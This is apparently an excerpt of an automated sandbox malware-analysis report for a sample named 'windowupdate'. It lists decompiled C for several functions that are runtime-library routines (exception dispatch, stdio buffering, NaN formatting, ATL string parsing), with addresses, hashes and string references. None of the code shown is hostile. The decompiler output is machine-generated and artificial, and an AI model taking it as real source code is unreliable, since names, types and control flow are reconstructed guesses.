                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8$Smanip
                      • String ID: %ls$C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h$C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\DuckDoerDlg.h$Invalid message map ID (%i)
                      • API String ID: 3890940529-3131995353
                      • Opcode ID: 563f26dc076e2fdfc9b0061fac9cea64ab7ab21ffe75d9bec0dc906ddc83b8e5
                      • Instruction ID: 2dbabd4edea52d92538b41bd5e3f3da9a7e70ace3724aa89fa792ee8e628432a
                      • Opcode Fuzzy Hash: 563f26dc076e2fdfc9b0061fac9cea64ab7ab21ffe75d9bec0dc906ddc83b8e5
                      • Instruction Fuzzy Hash: C49198B0A0060AEFDB14DF48D852BFE77B5EF44300F548578F516AB28AC6789A94CF60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D38100 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 169COMMON
                      Download Yara Rule
                      C-Code - Quality: 81%
                      			E00D38100(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, CHAR* _a4, signed int _a8, intOrPtr _a12, CHAR** _a16) {
				signed int _v8;
				intOrPtr _v12;
				CHAR** _v16;
				CHAR* _v20;
				CHAR* _v24;
				intOrPtr _v28;
				char _v64;
				CHAR* _v72;
				CHAR* _v76;
				char _v84;
				signed int _t64;
				CHAR* _t70;
				void* _t72;
				CHAR* _t81;
				CHAR* _t83;
				CHAR* _t87;
				CHAR* _t95;
				void* _t100;
				intOrPtr _t104;
				signed int _t106;
				CHAR* _t132;
				void* _t134;
				void* _t141;
				void* _t142;
				signed int _t144;
				void* _t145;
				void* _t146;

				_t143 = __esi;
				_t100 = __ebx;
				_push(__ecx);
				_t141 =  &_v84;
				memset(_t141, 0xcccccccc, 0x14 << 2);
				_t146 = _t145 + 0xc;
				_t142 = _t141 + 0x14;
				_pop(_t104);
				_t64 =  *0xdf600c; // 0x71e60372
				_v8 = _t64 ^ _t144;
				_v12 = _t104;
				if(_a16 != 0) {
					_v16 = _a16;
					_t132 =  *(_a4 + _a8 * 8);
					 *_v16 = _t132;
					__eflags =  *_v16;
					if( *_v16 != 0) {
						_t106 = _a8;
						_t132 = _a4;
						__eflags = _t132[4 + _t106 * 8] & 0x000000ff;
						if((_t132[4 + _t106 * 8] & 0x000000ff) == 0) {
							L25:
							_t70 = 0;
							__eflags = 0;
						} else {
							E00D3E030(_a12);
							_v20 =  *_v16;
							 *_v16 = 0;
							while(1) {
								_t132 =  *_v20;
								__eflags = _t132;
								if(_t132 == 0) {
									break;
								}
								__eflags =  *_v20 - 0x25;
								if( *_v20 != 0x25) {
									E00D3E0B0(_t100, _a12, _t142, _t143, _v20);
									goto L23;
								} else {
									_t143 = _t146;
									_t132 = _v20;
									_t83 = CharNextA(_t132);
									__eflags = _t146 - _t146;
									_v20 = E00DC1520(_t83, _t146 - _t146);
									_t117 =  *_v20;
									__eflags =  *_v20 - 0x25;
									if( *_v20 != 0x25) {
										_t87 = E00D41F90(_t117, _v20, 0x25);
										_t146 = _t146 + 8;
										_v24 = _t87;
										__eflags = _v24;
										if(__eflags != 0) {
											_v28 = _v24 - _v20;
											__eflags = _v28 - 0x1f;
											if(__eflags <= 0) {
												E00D32750(_t100, _t142, _t143, __eflags,  &_v64, 0x20, _v20, _v28);
												_t146 = _t146 + 0x10;
												_t132 =  &_v64;
												_v72 = E00D373F0(_v12 + 4, _t143, __eflags, _t132);
												__eflags = _v72;
												if(_v72 != 0) {
													_v76 = 0;
													while(1) {
														__eflags = _v72[_v76];
														if(_v72[_v76] == 0) {
															break;
														}
														E00D3E0B0(_t100, _a12, _t142, _t143,  &(_v72[_v76]));
														_t95 =  &(_v76[1]);
														__eflags = _t95;
														_v76 = _t95;
													}
													_v20 = _v24;
													goto L21;
												} else {
													_t70 = 0x80004005;
												}
											} else {
												_t70 = 0x80004005;
											}
										} else {
											_push("Error : closing \'%%\' found\n");
											_push(0);
											_push(E00D3F1F0(0xf237ac));
											_push(E00D323B0( &_v84, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x170));
											E00D323E0(_t100, _t142, _t143, __eflags);
											_t146 = _t146 + 0x10;
											_t70 = 0x80004005;
										}
									} else {
										E00D3E0B0(_t100, _a12, _t142, _t143, _v20);
										L21:
										L23:
										_t143 = _t146;
										_t81 = CharNextA(_v20);
										__eflags = _t146 - _t146;
										_v20 = E00DC1520(_t81, _t146 - _t146);
										continue;
									}
								}
								goto L26;
							}
							E00D3E0B0(_t100, _a12, _t142, _t143, _v20);
							goto L25;
						}
					} else {
						_t70 = 1;
					}
				} else {
					_t70 = 0x80070057;
				}
				L26:
				E00DC14C0(_t144, 0xd38310);
				_t72 = _t70;
				_t134 = _t132;
				return E00DC1520(E00D47280(_t72, _t100, _v8 ^ _t144, _t134, _t142, _t143), _t144 - _t146 + 0x50);
			}






























                      0x00d38100
                      0x00d38100
                      0x00d38108
                      0x00d38109
                      0x00d38116
                      0x00d38116
                      0x00d38116
                      0x00d38118
                      0x00d38119
                      0x00d38120
                      0x00d38123
                      0x00d3812a
                      0x00d38139
                      0x00d38145
                      0x00d38148
                      0x00d3814d
                      0x00d38150
                      0x00d3815c
                      0x00d3815f
                      0x00d38167
                      0x00d38169
                      0x00d382de
                      0x00d382de
                      0x00d382de
                      0x00d3816f
                      0x00d38172
                      0x00d3817c
                      0x00d38182
                      0x00d38188
                      0x00d3818b
                      0x00d3818e
                      0x00d38190
                      0x00000000
                      0x00000000
                      0x00d3819c
                      0x00d3819f
                      0x00d382b2
                      0x00000000
                      0x00d381a5
                      0x00d381a5
                      0x00d381a7
                      0x00d381ab
                      0x00d381b1
                      0x00d381b8
                      0x00d381be
                      0x00d381c1
                      0x00d381c4
                      0x00d381dd
                      0x00d381e2
                      0x00d381e5
                      0x00d381e8
                      0x00d381ec
                      0x00d3822b
                      0x00d3822e
                      0x00d38232
                      0x00d3824c
                      0x00d38251
                      0x00d38254
                      0x00d38263
                      0x00d38266
                      0x00d3826a
                      0x00d38273
                      0x00d38285
                      0x00d3828e
                      0x00d38290
                      0x00000000
                      0x00000000
                      0x00d3829c
                      0x00d3827f
                      0x00d3827f
                      0x00d38282
                      0x00d38282
                      0x00d382a6
                      0x00000000
                      0x00d3826c
                      0x00d3826c
                      0x00d3826c
                      0x00d38234
                      0x00d38234
                      0x00d38234
                      0x00d381ee
                      0x00d381ee
                      0x00d381f3
                      0x00d381ff
                      0x00d38212
                      0x00d38213
                      0x00d38218
                      0x00d3821b
                      0x00d3821b
                      0x00d381c6
                      0x00d381cd
                      0x00d382a9
                      0x00d382b7
                      0x00d382b7
                      0x00d382bd
                      0x00d382c3
                      0x00d382ca
                      0x00000000
                      0x00d382ca
                      0x00d381c4
                      0x00000000
                      0x00d3819f
                      0x00d382d9
                      0x00000000
                      0x00d382d9
                      0x00d38152
                      0x00d38152
                      0x00d38152
                      0x00d3812c
                      0x00d3812c
                      0x00d3812c
                      0x00d382e0
                      0x00d382ea
                      0x00d382ef
                      0x00d382f0
                      0x00d3830a

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D382EA
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00D38205
                      • Error : closing '%%' found, xrefs: 00D381EE
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$Error : closing '%%' found
                      • API String ID: 930174750-1365711956
                      • Opcode ID: b8f2c3c099cbd9b928e9d5b2c454815dced8a6bd2f4513dad864e3089ee8e049
                      • Instruction ID: 7ca013fd35f07c58d163670e704b6ba1b17c020c43626f9ec4bc2ba57774cad4
                      • Opcode Fuzzy Hash: b8f2c3c099cbd9b928e9d5b2c454815dced8a6bd2f4513dad864e3089ee8e049
                      • Instruction Fuzzy Hash: 8A516875E0461A9FCB04DFA8C891ABFB7B5FF84300F144419F816AB391DA70A941DBB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D49CD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145COMMON
                      Download Yara Rule
                      C-Code - Quality: 80%
                      			E00D49CD0(void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _t127;
				void* _t149;
				void* _t152;

				_v5 = 0;
				_v48 = 1;
				 *_a4 = E00DBF650( *_a4);
				_v12 = _a8 - 8;
				_v16 = _v12 + 0x18;
				_v24 =  *(_v12 + 0x10) ^  *0xdf600c;
				E00D49C70(_v24, _v16);
				E00D4E290(_v16, _a12);
				_t152 = _t149 + 0x10;
				if(( *(_a4 + 4) & 0x00000066) != 0) {
					if( *((intOrPtr*)(_v12 + 0x14)) != 0xfffffffe) {
						E00D4E4E0(_v12 + 8, 0xfffffffe, _v16, 0xdf600c);
						_v5 = 1;
					}
					goto L19;
				} else {
					_v56 = _a4;
					_v52 = _a12;
					 *((intOrPtr*)(_v12 + 4)) =  &_v56;
					_v20 =  *((intOrPtr*)(_v12 + 0x14));
					while(_v20 != 0xfffffffe) {
						_v28 = _v24 + 0x10 + _v20 * 0xc;
						_v32 =  *((intOrPtr*)(_v28 + 4));
						_v44 =  *_v28;
						if(_v32 == 0) {
							L15:
							_v20 = _v44;
							continue;
						}
						_v36 = E00D4E480(_v32, _v16);
						_v5 = 1;
						if(_v36 >= 0) {
							if(_v36 > 0) {
								if( *_a4 == 0xe06d7363 &&  *0xdc8790 != 0) {
									_t96 = E00DBEA70(0xdc8790);
									_t152 = _t152 + 4;
									if(_t96 != 0) {
										_t127 =  *0xdc8790; // 0xd4b0e0
										_v40 = _t127;
										 *0xdc62b0(_a4, 1);
										_t96 = _v40();
										_t152 = _t152 + 8;
									}
								}
								E00D4E4C0(_t96, _v12 + 8, _a4);
								if( *((intOrPtr*)(_v12 + 0x14)) != _v20) {
									E00D4E4E0(_v12 + 8, _v20, _v16, 0xdf600c);
								}
								 *((intOrPtr*)(_v12 + 0x14)) = _v44;
								E00D49C70(_v24, _v16);
								_t152 = _t152 + 8;
								E00D4E4A0();
							}
							goto L15;
						}
						_v48 = 0;
						break;
					}
					L19:
					if((_v5 & 0x000000ff) != 0) {
						E00D49C70(_v24, _v16);
					}
					return _v48;
				}
			}



















                      0x00d49cd6
                      0x00d49cda
                      0x00d49cf2
                      0x00d49cfa
                      0x00d49d03
                      0x00d49d12
                      0x00d49d1d
                      0x00d49d29
                      0x00d49d2e
                      0x00d49d3a
                      0x00d49e74
                      0x00d49e8a
                      0x00d49e8f
                      0x00d49e8f
                      0x00000000
                      0x00d49d40
                      0x00d49d43
                      0x00d49d49
                      0x00d49d52
                      0x00d49d5b
                      0x00d49d66
                      0x00d49d7b
                      0x00d49d84
                      0x00d49d8c
                      0x00d49d93
                      0x00d49e66
                      0x00d49d63
                      0x00000000
                      0x00d49d63
                      0x00d49da4
                      0x00d49da7
                      0x00d49daf
                      0x00d49dc6
                      0x00d49dd5
                      0x00d49de5
                      0x00d49dea
                      0x00d49def
                      0x00d49df7
                      0x00d49dfd
                      0x00d49e03
                      0x00d49e09
                      0x00d49e0c
                      0x00d49e0c
                      0x00d49def
                      0x00d49e18
                      0x00d49e26
                      0x00d49e3a
                      0x00d49e3a
                      0x00d49e45
                      0x00d49e50
                      0x00d49e55
                      0x00d49e61
                      0x00d49e61
                      0x00000000
                      0x00d49dc6
                      0x00d49db1
                      0x00000000
                      0x00d49db1
                      0x00d49e93
                      0x00d49e99
                      0x00d49ea3
                      0x00d49ea8
                      0x00d49eb1
                      0x00d49eb1

                      APIs
                      • _ValidateLocalCookies.LIBCMTD ref: 00D49D1D
                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 00D49D29
                        • Part of subcall function 00D4E290: __guard_icall_checks_enforced.LIBCMTD ref: 00D4E296
                      • __IsNonwritableInCurrentImage.LIBCMTD ref: 00D49DE5
                      • _ValidateLocalCookies.LIBCMTD ref: 00D49E50
                      • _ValidateLocalCookies.LIBCMTD ref: 00D49EA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
                      • String ID: csm
                      • API String ID: 3439031638-1018135373
                      • Opcode ID: 7aca9e78d9ecc1acc0554beba47665ebccc93e36482a2e83f689c3d9d3477bf1
                      • Instruction ID: d5a7207636f51a19ccbfdbf113ee66accd7f00e18ab67816526cdde406fe2f3b
                      • Opcode Fuzzy Hash: 7aca9e78d9ecc1acc0554beba47665ebccc93e36482a2e83f689c3d9d3477bf1
                      • Instruction Fuzzy Hash: 71511C74E00209EFCB04CF95D895AAEBBB1FF88304F148168E815AB391D731EA41CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D99120 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 133timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E00D99120(intOrPtr _a4) {
				char _v8;
				signed int* _v12;
				char _v16;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t41;
				signed char _t43;
				void* _t52;
				void* _t54;
				void* _t65;
				intOrPtr _t89;
				void* _t100;
				void* _t102;
				void* _t103;

				_t105 = _a4;
				if(_a4 == 0) {
					_t65 = L00D84930(_t105, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_sftbuf.cpp", 0x26, 0, L"%ls", L"public_stream != nullptr");
					_t100 = _t100 + 0x18;
					if(_t65 == 1) {
						asm("int3");
					}
				}
				E00D66E20( &_v8, _a4);
				_t37 = E00DADA70( &_v8, E00D98780(E00D6C080( &_v8)));
				_t102 = _t100 + 8;
				if(_t37 != 0) {
					_t38 = E00D6C080( &_v8);
					_t39 = E00D98A50(1);
					_t103 = _t102 + 4;
					__eflags = _t38 - _t39;
					if(_t38 != _t39) {
						_t40 = E00D6C080( &_v8);
						_t41 = E00D98A50(2);
						_t103 = _t103 + 4;
						__eflags = _t40 - _t41;
						if(_t40 != _t41) {
							return 0;
						}
						_v12 = 0xf21190;
						L10:
						_t89 =  *0xf21184; // 0x0
						 *0xf21184 = _t89 + 1;
						_t43 = E00D99000( &_v8);
						__eflags = _t43 & 0x000000ff;
						if((_t43 & 0x000000ff) == 0) {
							E00D99080( &_v8, 0x282);
							__eflags =  *_v12;
							if( *_v12 == 0) {
								 *_v12 = E00D8C129(E00D4BF60( &_v16, E00D89580(0x1000, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_sftbuf.cpp", 0x40)));
								E00D4BFA0( &_v16);
							}
							__eflags =  *_v12;
							if( *_v12 != 0) {
								(E00D67320( &_v8))[1] =  *_v12;
								 *(E00D67320( &_v8)) =  *_v12;
								(E00D67320( &_v8))[2] = 0x1000;
								(E00D67320( &_v8))[6] = 0x1000;
								return 1;
							} else {
								_t52 = E00D67320( &_v8);
								(E00D67320( &_v8))[1] = _t52 + 0x14;
								_t54 = E00D67320( &_v8);
								 *(E00D67320( &_v8)) = _t54 + 0x14;
								(E00D67320( &_v8))[2] = 2;
								(E00D67320( &_v8))[6] = 2;
								return 1;
							}
						}
						return 0;
					}
					_v12 = 0xf2118c;
					goto L10;
				} else {
					return 0;
				}
			}



















                      0x00d99129
                      0x00d9912d
                      0x00d99144
                      0x00d99149
                      0x00d9914f
                      0x00d99151
                      0x00d99151
                      0x00d9914f
                      0x00d99159
                      0x00d99170
                      0x00d99175
                      0x00d9917a
                      0x00d99186
                      0x00d9918f
                      0x00d99194
                      0x00d99197
                      0x00d99199
                      0x00d991a7
                      0x00d991b0
                      0x00d991b5
                      0x00d991b8
                      0x00d991ba
                      0x00000000
                      0x00d991c5
                      0x00d991bc
                      0x00d991cc
                      0x00d991cc
                      0x00d991d5
                      0x00d991de
                      0x00d991e6
                      0x00d991e8
                      0x00d991f9
                      0x00d99201
                      0x00d99204
                      0x00d9922f
                      0x00d99234
                      0x00d99234
                      0x00d9923c
                      0x00d9923f
                      0x00d9929f
                      0x00d992af
                      0x00d992b9
                      0x00d992c8
                      0x00000000
                      0x00d99241
                      0x00d99244
                      0x00d99256
                      0x00d9925c
                      0x00d9926e
                      0x00d99278
                      0x00d99287
                      0x00000000
                      0x00d9928e
                      0x00d9923f
                      0x00000000
                      0x00d991ea
                      0x00d9919b
                      0x00000000
                      0x00d9917c
                      0x00000000
                      0x00d9917c

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D99159
                      • __wcstombs_l.LIBCMTD ref: 00D99214
                        • Part of subcall function 00D4BFA0: __crt_unique_heap_ptr.LIBCMTD ref: 00D4BFAA
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp, xrefs: 00D9913D
                      • public_stream != nullptr, xrefs: 00D9912F
                      • minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp, xrefs: 00D99208
                      • %ls, xrefs: 00D99134
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___crt_unique_heap_ptr__wcstombs_lstd::_
                      • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$public_stream != nullptr
                      • API String ID: 4232693209-3092436121
                      • Opcode ID: 6fb5802da9e9b25d70dc839e4aa0e41e88ff2f3714118c3cdc7920987d82cf4b
                      • Instruction ID: d99a7fb920cb19011dd375c8adac8f2c2221aeff5551aeaf8b34e5d37f605f3f
                      • Opcode Fuzzy Hash: 6fb5802da9e9b25d70dc839e4aa0e41e88ff2f3714118c3cdc7920987d82cf4b
                      • Instruction Fuzzy Hash: 1D418470900208EBDF14EB64D967BEDB774EF11304F5440A8E8166B292EB719F49EBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D97D80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 93%
                      			E00D97D80(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char* _a12, intOrPtr _a16, signed char _a20) {
				signed int _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				void* _v73;
				signed char _v74;
				void* _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _t59;
				void* _t72;
				void* _t77;
				void* _t98;
				void* _t99;
				signed int _t100;

				_t99 = __esi;
				_t98 = __edi;
				_t91 = __edx;
				_t77 = __ebx;
				_t59 =  *0xdf600c; // 0x71e60372
				_v8 = _t59 ^ _t100;
				if(_a16 >= (_a8 & 0x000000ff) + 4) {
					if((_a8 & 0x000000ff) != 0) {
						 *_a12 = 0x2d;
						_a12 = _a12 + 1;
						 *_a12 = 0;
						_a16 = _a16 - 1;
					}
					_v72 = "INF";
					_v68 = "INF";
					_v64 = "inf";
					_v60 = "inf";
					_v56 = "NAN";
					_v52 = "NAN";
					_v48 = "nan";
					_v44 = "nan";
					_v40 = "NAN(SNAN)";
					_v36 = "NAN";
					_v32 = "nan(snan)";
					_v28 = "nan";
					_v24 = "NAN(IND)";
					_v20 = "NAN";
					_v16 = "nan(ind)";
					_v12 = "nan";
					_v84 = _a4 - 1;
					if((_a20 & 0x000000ff) == 0) {
						_v80 = 2;
					} else {
						_v80 = 0;
					}
					_v88 = _v80;
					if(_a16 <= E00D82E00( *((intOrPtr*)(_t100 + (_v84 << 4) - 0x44 + _v88 * 4)))) {
						_v73 = 0;
					} else {
						_v73 = 1;
					}
					_v74 = _v73;
					if((_v74 & 0x000000ff) != 0) {
						_v92 = 0;
					} else {
						_v92 = 1;
					}
					_t91 = _a16;
					E00D84A20(E00D82DE0(_a12, _a16,  *((intOrPtr*)(_t100 + (_v84 << 4) - 0x44 + (_v88 + _v92) * 4))), _t70, L"strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])", L"fp_format_nan_or_infinity", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x58, 0);
					_t72 = 0;
				} else {
					 *_a12 = 0;
					_t72 = 0xc;
				}
				return E00D47280(_t72, _t77, _v8 ^ _t100, _t91, _t98, _t99);
			}
































                      0x00d97d80
                      0x00d97d80
                      0x00d97d80
                      0x00d97d80
                      0x00d97d88
                      0x00d97d8f
                      0x00d97d9c
                      0x00d97db4
                      0x00d97db9
                      0x00d97dc2
                      0x00d97dc8
                      0x00d97dd1
                      0x00d97dd1
                      0x00d97dd4
                      0x00d97ddb
                      0x00d97de2
                      0x00d97de9
                      0x00d97df0
                      0x00d97df7
                      0x00d97dfe
                      0x00d97e05
                      0x00d97e0c
                      0x00d97e13
                      0x00d97e1a
                      0x00d97e21
                      0x00d97e28
                      0x00d97e2f
                      0x00d97e36
                      0x00d97e3d
                      0x00d97e4a
                      0x00d97e53
                      0x00d97e5e
                      0x00d97e55
                      0x00d97e55
                      0x00d97e55
                      0x00d97e68
                      0x00d97e87
                      0x00d97e8f
                      0x00d97e89
                      0x00d97e89
                      0x00d97e89
                      0x00d97e96
                      0x00d97e9f
                      0x00d97eaa
                      0x00d97ea1
                      0x00d97ea1
                      0x00d97ea1
                      0x00d97ed8
                      0x00d97ee9
                      0x00d97ef1
                      0x00d97d9e
                      0x00d97da1
                      0x00d97da4
                      0x00d97da4
                      0x00d97f00

                      APIs
                      Strings
                      • fp_format_nan_or_infinity, xrefs: 00D97EBA
                      • minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 00D97EB5
                      • strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit]), xrefs: 00D97EBF
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __aligned_msize__invoke_watson_if_error_strlen
                      • String ID: fp_format_nan_or_infinity$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])
                      • API String ID: 2470549621-3631232711
                      • Opcode ID: 627704a97486e7128d0022704640af9eb4de749c5e4263a018b77cc975c56ec4
                      • Instruction ID: 974c9982af9e229a58238a41d54aa6e070302bff4a2014824c544ef5f207845e
                      • Opcode Fuzzy Hash: 627704a97486e7128d0022704640af9eb4de749c5e4263a018b77cc975c56ec4
                      • Instruction Fuzzy Hash: 194139B09042899BCF14DFA8D8557EEBFB1BF05308F584059E8116B381D7B69909CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D55350 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E00D55350(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v36;
				char _v44;
				char _v60;
				char* _t34;
				signed char _t37;
				char* _t38;
				intOrPtr _t44;
				intOrPtr* _t46;
				char* _t53;
				char* _t73;
				intOrPtr _t74;
				char* _t78;
				char _t84;

				_t34 =  *0xf20640; // 0x0
				if( *_t34 != 0) {
					_t78 =  *0xf20640; // 0x0
					__eflags =  *_t78 - 0x30;
					if( *_t78 < 0x30) {
						L5:
						E00D59C90( &_v60);
						_t37 = E00D4FA10( &_v60);
						__eflags = _t37 & 0x000000ff;
						if((_t37 & 0x000000ff) == 0) {
							L10:
							_t38 =  *0xf20640; // 0x0
							__eflags =  *_t38;
							if( *_t38 != 0) {
								_v8 = E00D4F350( &_v44, 2);
							} else {
								_v8 = E00D4F350( &_v36, 1);
							}
							_v12 = _v8;
							E00D4F240(_a4, _v12);
							return _a4;
						}
						_t44 =  *0xf20640; // 0x0
						 *0xf20640 = _t44 + 1;
						_t46 = E00D4FA30( &_v60);
						_v20 =  *_t46;
						_v16 =  *((intOrPtr*)(_t46 + 4));
						__eflags = _a8 - 0x42;
						if(__eflags != 0) {
							__eflags = _a8 - 0x41;
							if(__eflags != 0) {
								goto L10;
							}
							_push(_v16);
							E00D4EED0(_v20, __eflags, _a4, _v20);
							return _a4;
						}
						_push(_v16);
						E00D4EF60(_v20, __eflags, _a4, _v20);
						return _a4;
					}
					_t73 =  *0xf20640; // 0x0
					_t84 =  *_t73;
					__eflags = _t84 - 0x39;
					if(_t84 > 0x39) {
						goto L5;
					}
					_t53 =  *0xf20640; // 0x0
					asm("cdq");
					_v28 =  *_t53 - 0x2f;
					_v24 = _t84;
					_t74 =  *0xf20640; // 0x0
					 *0xf20640 = _t74 + 1;
					E00D4F510(__ebx, _a4, __edi, __esi, _v28, _v24);
					return _a4;
				}
